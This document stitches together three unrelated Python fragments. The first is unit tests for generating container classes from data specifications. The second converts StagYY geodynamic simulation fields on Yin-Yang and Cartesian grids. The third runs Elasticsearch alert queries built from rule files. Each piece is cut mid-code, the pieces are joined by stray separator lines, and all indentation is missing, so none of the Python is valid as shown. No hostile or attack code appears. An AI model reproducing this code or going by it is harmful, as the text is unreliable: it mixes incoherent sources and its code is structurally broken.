# append attr_name to classdict['__custom_fields__'] list
classdict.setdefault('process_field_spec', list()).append(attr_name)
@classmethod
def post_process(cls, classdict, bases, docval_args, spec):
classdict['post_process'] = True
spec = GroupSpec(
doc='A test group specification with a data type',
data_type_def='Baz',
attributes=[
AttributeSpec(name='attr1', doc='a string attribute', dtype='text')
]
)
spec_catalog = SpecCatalog()
spec_catalog.register_spec(spec, 'test.yaml')
namespace = SpecNamespace(
doc='a test namespace',
name=CORE_NAMESPACE,
schema=[{'source': 'test.yaml'}],
version='0.1.0',
catalog=spec_catalog
)
namespace_catalog = NamespaceCatalog()
namespace_catalog.add_namespace(CORE_NAMESPACE, namespace)
type_map = TypeMap(namespace_catalog)
type_map.register_generator(MyClassGenerator)
cls = type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
self.assertEqual(cls.process_field_spec, ['attr1'])
self.assertTrue(cls.post_process)
def test_bad_generator(self):
"""Test that register_generator raises an error if the generator is not an instance of CustomClassGenerator."""
class NotACustomClassGenerator:
pass
type_map = TypeMap()
msg = 'Generator <.*> must be a subclass of CustomClassGenerator.'
with self.assertRaisesRegex(ValueError, msg):
type_map.register_generator(NotACustomClassGenerator)
def test_no_generators(self):
"""Test that a ClassGenerator without registered generators does nothing."""
cg = ClassGenerator()
spec = GroupSpec(doc='A test group spec with a data type', data_type_def='Baz')
cls = cg.generate_class(data_type='Baz', spec=spec, parent_cls=Container, attr_names={}, type_map=TypeMap())
self.assertEqual(cls.__mro__, (cls, Container, AbstractContainer, object))
self.assertTrue(hasattr(cls, '__init__'))
class TestDynamicContainer(TestCase):
def setUp(self):
self.bar_spec = GroupSpec(
doc='A test group specification with a data type',
data_type_def='Bar',
datasets=[
DatasetSpec(
doc='a dataset',
dtype='int',
name='data',
attributes=[AttributeSpec(name='attr2', doc='an integer attribute', dtype='int')]
)
],
attributes=[AttributeSpec(name='attr1', doc='a string attribute', dtype='text')])
specs = [self.bar_spec]
containers = {'Bar': Bar}
self.type_map = create_test_type_map(specs, containers)
self.spec_catalog = self.type_map.namespace_catalog.get_namespace(CORE_NAMESPACE).catalog
def test_dynamic_container_creation(self):
baz_spec = GroupSpec('A test extension with no Container class',
data_type_def='Baz', data_type_inc=self.bar_spec,
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
expected_args = {'name', 'data', 'attr1', 'attr2', 'attr3', 'attr4'}
received_args = set()
for x in get_docval(cls.__init__):
if x['name'] != 'foo':
received_args.add(x['name'])
with self.subTest(name=x['name']):
self.assertNotIn('default', x)
self.assertSetEqual(expected_args, received_args)
self.assertEqual(cls.__name__, 'Baz')
self.assertTrue(issubclass(cls, Bar))
def test_dynamic_container_default_name(self):
baz_spec = GroupSpec('doc', default_name='bingo', data_type_def='Baz',
attributes=[AttributeSpec('attr4', 'another float attribute', 'float')])
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
inst = cls(attr4=10.)
self.assertEqual(inst.name, 'bingo')
def test_dynamic_container_creation_defaults(self):
baz_spec = GroupSpec('A test extension with no Container class',
data_type_def='Baz', data_type_inc=self.bar_spec,
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
expected_args = {'name', 'data', 'attr1', 'attr2', 'attr3', 'attr4', 'foo'}
received_args = set(map(lambda x: x['name'], get_docval(cls.__init__)))
self.assertSetEqual(expected_args, received_args)
self.assertEqual(cls.__name__, 'Baz')
self.assertTrue(issubclass(cls, Bar))
def test_dynamic_container_constructor(self):
baz_spec = GroupSpec('A test extension with no Container class',
data_type_def='Baz', data_type_inc=self.bar_spec,
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
# TODO: test that constructor works!
inst = cls('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
self.assertEqual(inst.name, 'My Baz')
self.assertEqual(inst.data, [1, 2, 3, 4])
self.assertEqual(inst.attr1, 'string attribute')
self.assertEqual(inst.attr2, 1000)
self.assertEqual(inst.attr3, 98.6)
self.assertEqual(inst.attr4, 1.0)
def test_dynamic_container_constructor_name(self):
# name is specified in spec and cannot be changed
baz_spec = GroupSpec('A test extension with no Container class',
data_type_def='Baz', data_type_inc=self.bar_spec,
name='A fixed name',
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
with self.assertRaises(TypeError):
inst = cls('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
inst = cls([1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
self.assertEqual(inst.name, 'A fixed name')
self.assertEqual(inst.data, [1, 2, 3, 4])
self.assertEqual(inst.attr1, 'string attribute')
self.assertEqual(inst.attr2, 1000)
self.assertEqual(inst.attr3, 98.6)
self.assertEqual(inst.attr4, 1.0)
def test_dynamic_container_constructor_name_default_name(self):
# if both name and default_name are specified, name should be used
with self.assertWarns(Warning):
baz_spec = GroupSpec('A test extension with no Container class',
data_type_def='Baz', data_type_inc=self.bar_spec,
name='A fixed name',
default_name='A default name',
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
cls = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
inst = cls([1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0)
self.assertEqual(inst.name, 'A fixed name')
def test_dynamic_container_composition(self):
baz_spec2 = GroupSpec('A composition inside', data_type_def='Baz2',
data_type_inc=self.bar_spec,
attributes=[
AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
baz_spec1 = GroupSpec('A composition test outside', data_type_def='Baz1', data_type_inc=self.bar_spec,
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')],
groups=[GroupSpec('A composition inside', data_type_inc='Baz2')])
self.spec_catalog.register_spec(baz_spec1, 'extension.yaml')
self.spec_catalog.register_spec(baz_spec2, 'extension.yaml')
Baz2 = self.type_map.get_dt_container_cls('Baz2', CORE_NAMESPACE)
Baz1 = self.type_map.get_dt_container_cls('Baz1', CORE_NAMESPACE)
Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0,
baz2=Baz2('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0))
Bar = self.type_map.get_dt_container_cls('Bar', CORE_NAMESPACE)
bar = Bar('My Bar', [1, 2, 3, 4], 'string attribute', 1000)
with self.assertRaises(TypeError):
Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0, baz2=bar)
def test_dynamic_container_composition_reverse_order(self):
baz_spec2 = GroupSpec('A composition inside', data_type_def='Baz2',
data_type_inc=self.bar_spec,
attributes=[
AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')])
baz_spec1 = GroupSpec('A composition test outside', data_type_def='Baz1', data_type_inc=self.bar_spec,
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')],
groups=[GroupSpec('A composition inside', data_type_inc='Baz2')])
self.spec_catalog.register_spec(baz_spec1, 'extension.yaml')
self.spec_catalog.register_spec(baz_spec2, 'extension.yaml')
Baz1 = self.type_map.get_dt_container_cls('Baz1', CORE_NAMESPACE)
Baz2 = self.type_map.get_dt_container_cls('Baz2', CORE_NAMESPACE)
Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0,
baz2=Baz2('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0))
Bar = self.type_map.get_dt_container_cls('Bar', CORE_NAMESPACE)
bar = Bar('My Bar', [1, 2, 3, 4], 'string attribute', 1000)
with self.assertRaises(TypeError):
Baz1('My Baz', [1, 2, 3, 4], 'string attribute', 1000, attr3=98.6, attr4=1.0, baz2=bar)
def test_dynamic_container_composition_missing_type(self):
baz_spec1 = GroupSpec('A composition test outside', data_type_def='Baz1', data_type_inc=self.bar_spec,
attributes=[AttributeSpec('attr3', 'a float attribute', 'float'),
AttributeSpec('attr4', 'another float attribute', 'float')],
groups=[GroupSpec('A composition inside', data_type_inc='Baz2')])
self.spec_catalog.register_spec(baz_spec1, 'extension.yaml')
msg = "No specification for 'Baz2' in namespace 'test_core'"
with self.assertRaisesWith(ValueError, msg):
self.type_map.get_dt_container_cls('Baz1', CORE_NAMESPACE)
def test_dynamic_container_fixed_name(self):
"""Test that dynamic class generation for an extended type with a fixed name works."""
baz_spec = GroupSpec('A test extension with no Container class',
data_type_def='Baz', data_type_inc=self.bar_spec, name='Baz')
self.spec_catalog.register_spec(baz_spec, 'extension.yaml')
Baz = self.type_map.get_dt_container_cls('Baz', CORE_NAMESPACE)
obj = Baz([1, 2, 3, 4], 'string attribute', attr2=1000)
self.assertEqual(obj.name, 'Baz')
def test_multi_container_spec(self):
multi_spec = GroupSpec(
doc='A test extension that contains a multi',
data_type_def='Multi',
groups=[
GroupSpec(data_type_inc=self.bar_spec, doc='test multi', quantity='*')
],
attributes=[
AttributeSpec(name='attr3', doc='a float attribute', dtype='float')
]
)
self.spec_catalog.register_spec(multi_spec, 'extension.yaml')
Bar = self.type_map.get_dt_container_cls('Bar', CORE_NAMESPACE)
Multi = self.type_map.get_dt_container_cls('Multi', CORE_NAMESPACE)
assert issubclass(Multi, MultiContainerInterface)
assert Multi.__clsconf__ == [
dict(
attr='bars',
type=Bar,
add='add_bars',
get='get_bars',
create='create_bars'
)
]
multi = Multi(
name='my_multi',
bars=[Bar('my_bar', list(range(10)), 'value1', 10)],
attr3=5.
)
assert multi.bars['my_bar'] == Bar('my_bar', list(range(10)), 'value1', 10)
assert multi.attr3 == 5.
class TestGetClassSeparateNamespace(TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
if os.path.exists(self.test_dir): # start clean
self.tearDown()
os.mkdir(self.test_dir)
self.bar_spec = GroupSpec(
doc='A test group specification with a data type',
data_type_def='Bar',
datasets=[
DatasetSpec(name='data', doc='a dataset', dtype='int')
],
attributes=[
AttributeSpec(name='attr1', doc='a string attribute', dtype='text'),
AttributeSpec(name='attr2', doc='an integer attribute', dtype='int')
]
)
self.type_map = TypeMap()
create_load_namespace_yaml(
namespace_name=CORE_NAMESPACE,
specs=[self.bar_spec],
output_dir=self.test_dir,
incl_types=dict(),
type_map=self.type_map
)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_get_class_separate_ns(self):
"""Test that get_class correctly sets the name and type hierarchy across namespaces."""
self.type_map.register_container_type(CORE_NAMESPACE, 'Bar', Bar)
baz_spec = GroupSpec(
doc='A test extension',
data_type_def='Baz',
data_type_inc='Bar',
)
create_load_namespace_yaml(
namespace_name='ndx-test',
specs=[baz_spec],
output_dir=self.test_dir,
incl_types={CORE_NAMESPACE: ['Bar']},
type_map=self.type_map
)
cls = self.type_map.get_dt_container_cls('Baz', 'ndx-test')
self.assertEqual(cls.__name__, 'Baz')
self.assertTrue(issubclass(cls, Bar))
def _build_separate_namespaces(self):
# create an empty extension to test ClassGenerator._get_container_type resolution
# the Bar class has not been mapped yet to the bar spec
qux_spec = DatasetSpec(
doc='A test extension',
data_type_def='Qux'
)
spam_spec = DatasetSpec(
doc='A test extension',
data_type_def='Spam'
)
create_load_namespace_yaml(
namespace_name='ndx-qux',
specs=[qux_spec, spam_spec],
output_dir=self.test_dir,
incl_types={},
type_map=self.type_map
)
# resolve Spam first so that ndx-qux is resolved first
self.type_map.get_dt_container_cls('Spam', 'ndx-qux')
baz_spec = GroupSpec(
doc='A test extension',
data_type_def='Baz',
data_type_inc='Bar',
groups=[
GroupSpec(data_type_inc='Qux', doc='a qux', quantity='?'),
GroupSpec(data_type_inc='Bar', doc='a bar', quantity='?')
]
)
create_load_namespace_yaml(
namespace_name='ndx-test',
specs=[baz_spec],
output_dir=self.test_dir,
incl_types={
CORE_NAMESPACE: ['Bar'],
'ndx-qux': ['Qux']
},
type_map=self.type_map
)
def _check_classes(self, baz_cls, bar_cls, bar_cls2, qux_cls, qux_cls2):
self.assertEqual(qux_cls.__name__, 'Qux')
self.assertEqual(baz_cls.__name__, 'Baz')
self.assertEqual(bar_cls.__name__, 'Bar')
self.assertIs(bar_cls, bar_cls2) # same class, two different namespaces
self.assertIs(qux_cls, qux_cls2)
self.assertTrue(issubclass(qux_cls, Data))
self.assertTrue(issubclass(baz_cls, bar_cls))
self.assertTrue(issubclass(bar_cls, Container))
qux_inst = qux_cls(name='qux_name', data=[1])
bar_inst = bar_cls(name='bar_name', data=100, attr1='a string', attr2=10)
baz_inst = baz_cls(name='baz_name', qux=qux_inst, bar=bar_inst, data=100, attr1='a string', attr2=10)
self.assertIs(baz_inst.qux, qux_inst)
def test_get_class_include_from_separate_ns_1(self):
"""Test that get_class correctly sets the name and includes types correctly across namespaces.
This is one of multiple tests carried out to ensure that order of which get_dt_container_cls is called
does not impact the results
first use EXTENSION namespace, then use ORIGINAL namespace
"""
self._build_separate_namespaces()
baz_cls = self.type_map.get_dt_container_cls('Baz', 'ndx-test') # Qux and Bar are not yet resolved
| |
coordinates"""
r = np.sqrt(x**2+y**2+z**2)
theta = np.arctan2(np.sqrt(x**2+y**2),z)
phi = np.arctan2(y,x)
return (r,theta,phi)
#Creation of Yin-Yang grids:
self.im(' - Creation of the spherical grids')
(self.x,self.y,self.z) = rectangular2Spherical(self.x,self.y,self.z,self.rcmb)
(self.r,self.theta,self.phi) = cartesian2spherical(self.x,self.y,self.z)
#=============================================================
#Processing of the field according to its scalar or vectorial nature:
if self.fieldNature == 'Scalar':
self.im(' - Build data grid for scalar field')
(Nx, Ny, Nz) = self.header.get('nts')
V = self.flds[0,:,:,:,0].reshape(Nx*Ny*Nz)
self.v = V[goodIndex].reshape(self.nx,self.ny,self.nz)
#Creation of empty vectorial fields arrays:
self.vx = np.array(self.vx)
self.vy = np.array(self.vy)
self.vz = np.array(self.vz)
self.P = np.array(self.P)
self.vr = np.array(self.vr)
self.vtheta = np.array(self.vtheta)
self.vphi = np.array(self.vphi)
elif self.fieldNature == 'Vectorial':
self.im(' - Build data grid for vectorial field')
(Nx, Ny, Nz) = self.header.get('nts')
temp_vx = self.flds[0][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
temp_vy = self.flds[1][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
temp_vz = self.flds[2][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
temp_P = self.flds[3][0:Nx,0:Ny,:].reshape(Nx*Ny*Nz)
self.vx = temp_vx[goodIndex].reshape(self.nx,self.ny,self.nz)
self.vy = temp_vy[goodIndex].reshape(self.nx,self.ny,self.nz)
self.vz = temp_vz[goodIndex].reshape(self.nx,self.ny,self.nz)
self.P = temp_P[goodIndex].reshape(self.nx,self.ny,self.nz)
self.v = np.sqrt(self.vx**2+self.vy**2+self.vz**2) #the norm
# -- From now, like for YY grids
#Transform velocities from internal Yin or Yang coord -> Cartesian
self.im(' - Merging of velocities: YY -> Cartesian')
tx_coord = self.header.get('e1_coord') #temps, will be immediately deleted after use
ty_coord = self.header.get('e2_coord')
tz_coord = self.header.get('e3_coord')
(tX,tY,tZ) = np.meshgrid(self.x_coords,self.y_coords,self.z_coords,indexing='ij')
tX = tX.flatten()
tY = tY.flatten()
tZ = tZ.flatten()
#R = tZ + self.rcmb
lat = np.pi/4 - tX
lon = tY - 3*np.pi/4
# --- on grid ---
Vtheta = self.vx.flatten()
Vphi = self.vy.flatten()
Vr = self.vz.flatten()
self.vx = Vtheta*np.sin(lat)*np.cos(lon) - Vphi*np.sin(lon) + Vr*np.cos(lat)*np.cos(lon)
self.vy = Vtheta*np.sin(lat)*np.sin(lon) + Vphi*np.cos(lon) + Vr*np.cos(lat)*np.sin(lon)
self.vz = -1*Vtheta*np.cos(lat) + Vr*np.sin(lat)
self.vr = Vr
#Discharge of the memory
(tX, tY, tZ) = (None, None, None)
(Vtheta, Vphi, Vr) = (None, None, None)
#Creation of non overlapping data matrices for Yin and Yang
self.vx = np.array(self.vx)
self.vy = np.array(self.vy)
self.vz = np.array(self.vz)
self.vr = np.array(self.vr)
self.P = np.array(self.P)
#Tranformation of velocities from cartesian to spherical:
self.im(' - Conversion of Velocities: Cartesian -> Spherical')
lat1 = np.arctan2(np.sqrt(self.x.flatten()**2+self.y.flatten()**2),self.z.flatten())
lon1 = np.arctan2(self.y.flatten(),self.x.flatten())
Vlat1 = self.vx*(np.cos(lon1)*np.cos(lat1)) + self.vy*(np.sin(lon1)*np.cos(lat1)) - self.vz*(np.sin(lat1))
Vlon1 = -self.vx*(np.sin(lon1)) + self.vy*(np.cos(lon1))
#Conservation of the ndarray-type:
self.vtheta = Vlat1.reshape(self.nx,self.ny,self.nz)
self.vphi = Vlon1.reshape(self.nx,self.ny,self.nz)
self.vx = self.vx.reshape(self.nx,self.ny,self.nz)
self.vy = self.vy.reshape(self.nx,self.ny,self.nz)
self.vz = self.vz.reshape(self.nx,self.ny,self.nz)
self.vr = self.vr.reshape(self.nx,self.ny,self.nz)
self.P = self.P.reshape(self.nx,self.ny,self.nz)
#fills the .v1 and .v2 by the norm of the velocity
self.v = np.sqrt(self.vx**2+self.vy**2+self.vz**2) #the norm
self.v = self.v.reshape(self.nx,self.ny,self.nz)
# == Processing Finish !
self.im('Processing of stag data done!')
class StagData():
"""
Defines the StagData structure dynamically from geometry of the grid.
"""
def __new__(cls,geometry='cart3D'):
"""
Force to have more than just 'duck typing' in Python: 'dynamical typing'
<i> : geometry = str, geometry of the grid. Must be in ('cart2D',
'cart3D','yy','annulus') for cartesian 2D, 3D,
Yin-Yang or annulus geometry, respectively. By
default, geometry = 'cart3D'
"""
if geometry == 'yy':
return StagYinYangGeometry()
elif geometry == 'cart2D' or geometry == 'cart3D':
return StagCartesianGeometry(geometry)
elif geometry == 'spherical':
return StagSphericalGeometry(geometry)
elif geometry == 'annulus':
raise GridGeometryInDevError(geometry)
else:
raise InputGridGeometryError(geometry)
class MainSliceData:
"""
Main class defining the highest level of inheritance
for StagData derived object
"""
def __init__(self):
"""
Parent builder
"""
# ----- Generic ----- #
self.pName = 'sliceData'
self.verbose = True #Condition on the verbose output
self.fieldType = 'Temperature' #Field contained in the current object
self.fieldNature = 'Scalar' #Nature of the field: Scalar or Vectorial
self.path = '' #The path to the stag file
self.fname = '' #File name of the stag file
self.resampling = []#Resampling Parameters
self.simuAge = 0 #Dimensionless age of the simulation
self.ti_step = 0 #Inner step of the stag simualtion state
self.layer = 0 #Selected value of the stagData.slayer for the current slice
self.depth = 0 #Corresponding depth in km according to rcmb
self.rcmb = 0 #Radius of the Core-Mantle Boundary
self.nx0 = 0 #Number of point in the x direction in the original input file
self.ny0 = 0 #Number of point in the y direction in the original input file
self.nz0 = 0 #Number of point in the z direction in the original input file
self.nx = 0 #Current number of point in the x direction (after resampling)
self.ny = 0 #Current number of point in the y direction (after resampling)
self.nz = 0 #Current number of point in the z direction (after resampling)
# Slice parameters:
self.axis = None #Axis of the slice
self.layer = None #Layer index of the slice
# Other
self.BIN = None
self.bin = None
def im(self,textMessage):
"""Print verbose internal message. This function depends on the
argument of self.verbose. If self.verbose == True then the message
will be displayed on the terminal.
<i> : textMessage = str, message to display
"""
if self.verbose == True:
print('>> '+self.pName+'| '+textMessage)
def sliceInheritance(self,stagData):
"""
Manages all field inheritance. Notice that stagData can be here
another sliceData (for instance in the particular case of a InterpolatedSliceData)
"""
self.fieldType = stagData.fieldType
self.fieldNature = stagData.fieldNature
self.path = stagData.path
self.fname = stagData.fname
self.resampling = stagData.resampling
self.simuAge = stagData.simuAge
self.ti_step = stagData.ti_step
self.rcmb = stagData.rcmb
self.nx0 = stagData.nx0
self.ny0 = stagData.ny0
self.nz0 = stagData.nz0
self.nx = stagData.nx
self.ny = stagData.ny
self.nz = stagData.nz
class YinYangSliceData(MainSliceData):
"""
Defines the structure of the YinYangSliceData object derived from MainSliceData type.
This object corresponds to a simplified StagYinYangGeometry object.
"""
def __init__(self):
super().__init__() # inherit all the methods and properties from MainSliceData
self.geometry = 'yy'
# ----- Yin Yang geometry ----- #
self.r1 = [] #Matrix of the radius of points for Yin grid
self.r2 = [] #Matrix of the radius of points for Yang grid
self.x1 = [] #Yin grid x matrix - non-overlapping grids:
self.y1 = [] #Yin grid y matrix
self.z1 = [] #Yin grid z matrix
self.x2 = [] #Yang grid x matrix
self.y2 = [] #Yang grid y matrix
self.z2 = [] #Yang grid z matrix
#For scalar field only:
self.v1 = [] #Matrix of scalar field for the Yin grid (or norm of velocity on Yin)
self.v2 = [] #Matrix of scalar field for the Yang grid (or norm of velocity on Yang)
#For vectorial field only:
self.vx1 = [] #Matrix of x-component of the velocity field for the Yin grid
self.vx2 = [] #Matrix of x-component of the velocity field for the Yang grid
self.vy1 = [] #Matrix of y-component of the velocity field for the Yin grid
self.vy2 = [] #Matrix of y-component of the velocity field for the Yang grid
self.vz1 = [] #Matrix of z-component of the velocity field for the Yin grid
self.vz2 = [] #Matrix of z-component of the velocity field for the Yang grid
self.P1 = [] #Matrix of the Pressure field for the Yin grid
self.P2 = [] #Matrix of the Pressure field for the Yang grid
self.vr1 = [] #Matrix of radial component of the velocity field for the Yin grid
self.vtheta1 = [] #Matrix of theta component of the velocity field for the Yin grid
self.vphi1 = [] #Matrix of phi component of the velocity field for the Yin grid
self.vr2 = [] #Matrix of radial component of the velocity field for the Yang grid
self.vtheta2 = [] #Matrix of theta component of the velocity field for the Yang grid
self.vphi2 = [] #Matrix of phi component of the velocity field for the Yang grid
#Stacked geometry
self.x = [] #np.ndarray for x1 and x2 stacked
self.y = [] #np.ndarray for y1 and y2 stacked
self.z = [] #np.ndarray for z1 and z2 stacked
#Stacked scalar fields
self.v = [] #np.ndarray for v1 and v2 stacked
#Staked vectorial fields
self.vx = []
self.vy = []
self.vz = []
self.P = []
self.vtheta = []
self.vphi = []
self.vr = []
def stackyy(self):
"""
Computes all stacked fields from YinYang grid
"""
#Dynamic containers: Use CPU on each call
nodp = self.x1.shape[0]
nodv = self.v1.shape[0]
self.im('Stack grid matrices')
self.x = np.zeros((nodp*2))
self.x[0:nodp] = self.x1
self.x[nodp:2*nodp] = self.x2
self.y = np.zeros((nodp*2))
self.y[0:nodp] = self.y1
self.y[nodp:2*nodp] = self.y2
self.z | |
delimiter = ',__delim:'
new_fields = []
new_field = {}
for x in re.split('^| --',search):
x = x.strip()
new_field = {}
if x.startswith(item) or x.startswith('--'+item) or x.startswith(item[2:]):
sfields,new_field['delim'] = x.split(delimiter)
new_field['delim'] = new_field['delim'].strip().strip('\'')
sfields = sfields.split(item)[1]
new_field['new_field_name'],new_field['from_field_name'],new_field['array_item'] = sfields.split(',',2)
new_fields.append(new_field)
#logging.debug("adding field based on split: {} {} {} {}".format(new_field['new_field_name'],new_field['from_field_name'],new_field['delim'],new_field['array_item']))
if new_fields:
return new_fields
else:
return None
def getSearchFileItem(self,search,item):
for x in re.split('^| --',search):
x = x.strip()
if x.startswith(item) or x.startswith('--'+item) or x.startswith(item[2:]):
return x.split(":",1)[1].strip()
return None
def addNewFieldsToResult(self,alert_result,added_fields):
#print("{} {}".format(json.dumps(alert_result),json.dumps(added_fields)))
#for any new fields defined from existing fields for output
if added_fields:
for field in added_fields:
if field['from_field_name'] in alert_result['_source']:
regex = re.compile(field['regex'])
m = regex.search(alert_result['_source'][field['from_field_name']])
if m:
alert_result['_source'][field['new_field_name']] = m.group(0).strip("\"").strip()
else:
logging.debug('no match to create new field {}, with regex {}, for content {}'.format(field['new_field_name'],field['regex'],alert_result['_source'][field['from_field_name']]))
else:
logging.debug('not able to add new field {}, {} does not exist'.format(field['new_field_name'],field['from_field_name']))
return alert_result
def addSplitFieldToResult(self,alert_result,split_fields):
if split_fields:
for field in split_fields:
if field['from_field_name'] in alert_result['_source']:
#new field = <existing field>.split(delim)[array_item]
if field['delim'] in alert_result['_source'][field['from_field_name']]:
alert_result['_source'][field['new_field_name']] = alert_result['_source'][field['from_field_name']].split(field['delim'])[int(field['array_item'])]
logging.debug('created new field {}:{}'.format(field['new_field_name'],alert_result['_source'][field['new_field_name']]))
else:
logging.debug('split did not match, just copying field contents as default behavior {} {} {} {}'.format(field['from_field_name'],field['delim'],field['array_item'],alert_result['_source'][field['from_field_name']]))
alert_result['_source'][field['new_field_name']] = alert_result['_source'][field['from_field_name']]
return alert_result
def addJoinedFieldToResult(self,alert_result,joined_fields):
if joined_fields:
for fields in joined_fields:
fields_exist = True
for field in fields['fields'].split(','): #comma separated list of fields to concatentate
if not field in alert_result['_source']:
logging.warning("Join Field Error - Missing Field - {} - Not joining fields for this alert in {}".format(field,alert_result['_source'].keys()))
fields_exist = False
if fields_exist:
build_field = ""
for field in fields['fields'].split(','):
build_field = build_field + alert_result['_source'][field] + fields['delim']
build_field = build_field[:len(build_field)-len(fields['delim'])] #take off the last delim from the loop
alert_result['_source'][fields['new_field_name']] = build_field
return alert_result
def _execute(self, earliest=None, latest=None, use_index_time=None, max_result_count=None):
# read in search text
with open(self.config['rule']['search'], 'r') as fp:
search_text = fp.read()
# remove comment lines starting with #
search_text = re.sub(r'^\s*#.*$', '', search_text, count=0, flags=re.MULTILINE)
# run the includes you might have
while True:
m = re.search(r'<include:([^>]+)>', search_text)
if not m:
break
include_path = os.path.join(BASE_DIR, m.group(1))
if not os.path.exists(include_path):
logging.fatal("rule {0} included file {1} does not exist".format(self.search_name, include_path))
sys.exit(1)
with open(include_path, 'r') as fp:
search_text = search_text.replace(m.group(0), fp.read().strip())
search_text = search_text.replace("\n"," ")
searches = search_text.split(" |pipe-field-output ")
#print(searches)
added_fields = None
joined_fields = None
search_index = None
output_fields = None
output_field_rename = None
search_json = None
now = time.mktime(time.localtime())
#if there is only one search defined (no subsearch, no |pipe_field-output), things are easier
#get all the supported parameters from the file and create the json needed for the search
if len(searches) == 1:
search_index = self.getSearchFileItem(searches[0],'--index:')
search_query = self.getSearchFileItem(searches[0],'--search:')
output_fields = self.getSearchFileItem(searches[0],'--fields:')
filter_script = self.getSearchFileItem(searches[0],'--filter-script:')
added_fields = self.getSearchAddedFields(searches[0])
joined_fields = self.getSearchJoinedFields(searches[0])
split_fields = self.getSearchSplitField(searches[0])
search_json,search_uri = self.search_to_json(search_query,search_index,filter_script,output_fields,earliest,latest,use_index_time,max_result_count)
else:
i = 0
piped_search_output = []
for search in searches:
search = search.strip()
i = i + 1
search_index = self.getSearchFileItem(search,'--index:')
search_query = self.getSearchFileItem(search,'--search:')
output_fields = self.getSearchFileItem(search,'--fields:')
filter_script = self.getSearchFileItem(search,'--filter-script:')
added_fields = self.getSearchAddedFields(search)
joined_fields = self.getSearchJoinedFields(search)
split_fields = self.getSearchSplitField(search)
output_field_rename = self.getSearchFileItem(search,'--field-rename:')
#append previous command output to this search if not the first search
if i > 1 and len(piped_search_output) > 0:
x = 0
for item in piped_search_output:
for key,value in item.items():
if x == 0:
if search_query.strip() != "":
search_query = '{} AND ({}:"{}"'.format(search_query,key,value)
else: #if no additional search text
search_query = '({}:"{}"'.format(key,value)
x = x + 1
else:
search_query = '{} OR {}:"{}"'.format(search_query,key,value)
search_query = '{})'.format(search_query)
#reinitialize so output isn't used again accidentally
piped_search_output = []
search_json,search_uri = self.search_to_json(search_query,search_index,filter_script,output_fields,earliest,latest,use_index_time,max_result_count)
#if not the last search, perform the query, rename fields if needed
if i != len(searches):
search_json['size'] = 10000
logging.debug("lucene search: {}".format(search_query))
search_result = self.perform_query(search_json,search_uri)
if not search_result:
if DAEMON_MODE:
self.last_executed_time = now
return False
results = search_result.json()["hits"]["hits"]
# if no results, then don't search again, just quit, but make sure we log that we ran it
if not results:
if DAEMON_MODE:
self.last_executed_time = now
return False
deduped_output = set()
if len(search_result.json()["hits"]["hits"]) > 9999:
logging.error("piped search results too big. >= 10000 results (elasticsearch limit). Exiting.")
if DAEMON_MODE:
self.last_executed_time = now
return False
for hit in results:
#if we are changing the field name, change it in the results
if output_field_rename:
current_field,new_field = output_field_rename.split(',')
current_hit = hit['_source'][current_field]
hit['_source'][new_field] = current_hit
del hit['_source'][current_field]
#only add items that do not exist (dedup/unique)
deduped_output.add(json.dumps(hit['_source']))
for n in deduped_output:
piped_search_output.append(json.loads(n))
logging.debug("lucene search: {}".format(search_query))
search_result = self.perform_query(search_json,search_uri)
if not search_result:
return False
# record the fact that we ran it
if DAEMON_MODE:
self.last_executed_time = now
# get group by value
if 'group_by' in self.config['rule']:
group_by_value = self.config['rule']['group_by']
else:
group_by_value = None
# group results
alerts = {}
tmp_key = 0
results = search_result.json()["hits"]["hits"]
for alert_result in results:
combined_results = {}
#####for any new fields defined from existing fields for output
if added_fields:
alert_result = self.addNewFieldsToResult(alert_result,added_fields)
if split_fields:
alert_result = self.addSplitFieldToResult(alert_result,split_fields)
if joined_fields:
alert_result = self.addJoinedFieldToResult(alert_result,joined_fields)
####
